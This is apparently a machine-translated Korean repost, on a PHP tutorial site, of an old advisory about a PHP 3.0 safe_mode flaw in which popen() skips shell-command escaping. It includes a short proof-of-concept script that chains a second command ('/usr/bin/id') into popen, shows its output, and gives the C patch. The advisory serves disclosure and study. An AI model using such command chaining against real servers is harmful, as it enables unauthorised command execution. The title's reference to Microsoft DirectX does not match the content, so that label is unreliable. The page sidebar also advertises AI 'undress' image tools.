Microsoft directx PHP3 safe_mode 잘못된 취약점-PHP 튜토리얼-php.cn

집

백엔드 개발

PHP 튜토리얼

Microsoft directx PHP3 safe_mode 잘못된 취약점

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 29, 2016 am 08:34 AM

영향을 받는 시스템: PHP 3.00
----------------------------- --------------------------------------
설명:
PHP 버전 3.0은 HTML 임베디드 스크립팅 언어. 구문의 대부분은 C, Java 및 Perl에 이식되었으며
PHP의 기능과 결합되었습니다. 이 언어를 사용하면 웹 개발자는 동적 웹 페이지를 빠르게 만들 수 있습니다.
웹 서버에서 실행되고 사용자가 코드를 실행할 수 있도록 하기 때문에 PHP에는 'safe_mode'라는 보안 기능이 내장되어 있습니다. 이 기능은
PHP 작업이 가능한 웹루트 환경에서 명령 실행을 제어하는 데 사용됩니다. .
구현 메커니즘은 쉘 명령 시스템 호출을 강제로 실행하여 쉘 명령을 EscapeShellCmd()
함수로 전달하는 것입니다. 이 함수는 해당 명령이 웹루트 디렉토리 외부에서 실행될 수 없음을 확인하는 데 사용됩니다.
일부 PHP 버전에서는 popen() 명령을 사용할 때 EscapeShellCmd()가 실패하여 악의적인 사용자가
'popen' 시스템 호출을 사용하여 불법적인 작업을 수행할 수 있습니다.
---------------------------------- -- ----------------------------------
테스트 프로그램:
주의: 다음 프로그램은 (방법)은 안전 연구 및 교육 목적으로만 공격적일 수 있습니다. 자신의 책임하에 사용하십시오!
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r")
echo "$fp
n"; 🎜>while($line = fgets($fp, 1024)):
printf("%s
n", $line)
endwhile
pclose($fp); >phpinfo();
?>
출력 결과는 다음과 같습니다.
1
total 53
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls
uid= 30(wwwrun) gid=65534(nogroup) groups=65534(nogroup)
그리고 phpinfo()의 구성 값에서:
safe_mode 0 1
--------- ----- ------------------- ----- ------------------
제안:
색인: function/file.c
========= ===== ============================================ ===== ===
RCS 파일: /repository/php3/functions/file.c,v
버전 1.229 검색 중
버전 1.230 검색 중
diff -u -r1.229 -r1 .230
--- function/file.c 2000/01/01 04:31:15 1.229
function/file.c 2000/01/03 21:31:31 1.230
@@ -26 ,7 26,7 @@
| 저자: Rasmus Lerdorf
--------- ----- -------------------
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
/* $Id: file.c,v 1.230 2000 /01/03 21:31 :31 kk Exp $ */
#include "php.h"
#include
@@ -51,6 51,7 @@
#include "safe_mode.h"
#include "php3_list.h"
#include "php3_string.h"
#include "exec.h"
#include "file.h"
#if HAVE_PWD_H
#if MSVC5
@@ -575,7 576,7 @@
pval *arg1, *arg2
FILE *fp
- char *p
char *p, *tmp = NULL
char *b, buf[1024]
TLS_VARS
@ -600,7 601,11 @@
} else {
snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1->value.str.val)
}
- fp = popen( buf,p);

tmp = _php3_escapeshellcmd(buf);
fp = popen(tmp,p)
efree(tmp); /* 임시 복사본, 더 이상 필요하지 않음 */ >
if (!fp) {
php3_error(E_WARNING,"popen("%s","%s") - %s",buf,p,strerror(errno))
RETURN_FALSE;

위 내용은 Microsoft directx의 내용을 포함하여 Microsoft directx PHP3 safe_mode 실패 취약점을 소개하고 있으며 PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다.

본 웹사이트의 성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?

7463

Cakephp 튜토리얼

1376

Steam의 계정 이름 형식은 무엇입니까?

Win11 활성화 키 영구

NYT 연결 힌트와 답변

Related knowledge

Laravel의 플래시 세션 데이터로 작업합니다 Mar 12, 2025 pm 05:08 PM

Laravel은 직관적 인 플래시 방법을 사용하여 임시 세션 데이터 처리를 단순화합니다. 응용 프로그램에 간단한 메시지, 경고 또는 알림을 표시하는 데 적합합니다. 데이터는 기본적으로 후속 요청에만 지속됩니다. $ 요청-

PHP의 컬 : REST API에서 PHP Curl Extension 사용 방법 Mar 14, 2025 am 11:42 AM

PHP 클라이언트 URL (CURL) 확장자는 개발자를위한 강력한 도구이며 원격 서버 및 REST API와의 원활한 상호 작용을 가능하게합니다. PHP CURL은 존경받는 다중 프로모토콜 파일 전송 라이브러리 인 Libcurl을 활용하여 효율적인 execu를 용이하게합니다.

Laravel 테스트에서 단순화 된 HTTP 응답 조롱 Mar 12, 2025 pm 05:09 PM

Laravel은 간결한 HTTP 응답 시뮬레이션 구문을 제공하여 HTTP 상호 작용 테스트를 단순화합니다. 이 접근법은 테스트 시뮬레이션을보다 직관적으로 만들면서 코드 중복성을 크게 줄입니다. 기본 구현은 다양한 응답 유형 단축키를 제공합니다. Illuminate \ support \ Facades \ http를 사용하십시오. http :: 가짜 ([ 'google.com'=> 'Hello World', 'github.com'=> [ 'foo'=> 'bar'], 'forge.laravel.com'=>